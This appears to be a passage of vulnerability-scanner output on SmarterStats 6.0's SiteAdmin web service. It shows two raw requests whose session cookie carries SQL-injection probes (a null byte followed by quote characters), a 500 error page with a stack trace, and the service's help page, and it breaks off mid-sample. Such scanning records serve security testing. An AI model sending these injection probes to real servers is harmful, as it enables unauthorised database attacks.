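Run as recorded, the two responses above yield "differential_but_non_sql_error": the status changed between the probes, but the exception is not a provider error, so the finding stays tentative until the serial re-test in `probe` returns a reproducible database error.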

Request 1

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%00'; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%00''; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 28998
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetAllSites2</h2>
<p class="intro">Returns all sites listed in the MRS with multiple log locations.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetAllSites2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IncludeDetails:</td>
<td><input class="frmInput" type="text" size="50" name="IncludeDetails"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetAllSites2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetAllSites2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetAllSites2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

